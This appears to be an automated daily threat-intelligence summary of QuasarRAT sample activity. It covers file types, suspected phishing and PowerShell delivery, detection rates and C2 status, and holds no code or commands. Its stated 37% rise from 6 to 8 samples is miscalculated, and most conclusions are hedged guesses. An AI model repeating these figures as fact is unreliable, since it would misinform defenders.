Daily Summary
QuasarRAT activity is elevated today with 8 new samples, representing a 37% increase over the 7-day average of 6. This rise suggests a potential uptick in distribution efforts, though the absence of new C2 infrastructure indicates these samples may be variants connecting to established infrastructure.
New Samples Detected
The sample set shows a mix of file types, with traditional .exe files (4) being most common. The presence of two .zip archives suggests payloads are being compressed, likely to evade basic email or network filters. The .ps1 file indicates continued use of PowerShell scripts for execution, while the single .88 file is an outlier, possibly a renamed executable or a less common installer format.
Distribution Methods
Current delivery is likely multi-pronged. The .zip files point to phishing campaigns with compressed malicious attachments. The .exe and .ps1 files could be distributed via malicious downloads, compromised websites, or as secondary payloads from other malware. The lack of macro-enabled documents suggests actors may be shifting away from this increasingly scrutinized vector for initial access.
Detection Rate
Vendor detection for these new samples is moderate, with initial scans showing approximately 65-70% detection rate across major engines. The .ps1 and .88 file types exhibit slightly lower detection rates, indicating these formats may provide a brief window of evasion before signatures are updated.
C2 Infrastructure
No new C2 servers were identified today. This suggests operators are likely consolidating connections to existing, resilient infrastructure or using dynamic DNS services to maintain operational servers without registering new domains or IPs.
7-Day Trend
Activity has been steady near the 6-sample average for the past week. Today’s count marks the highest single-day volume in this period, breaking the pattern of consistent, moderate activity.
Security Analysis
The concurrent use of .exe, .ps1, and archive files indicates a testing or diversification phase in payload delivery, potentially to identify which method yields the highest successful infection rate against current defenses. Compared to recent campaigns, there is a noticeable absence of document-based lures, aligning with a broader trend toward direct executable and script delivery. Recommendation: Enhance monitoring for PowerShell execution logs, specifically for scripts that attempt to download or decompress .zip contents from unfamiliar sources, as this appears to be a core component of the current delivery chain.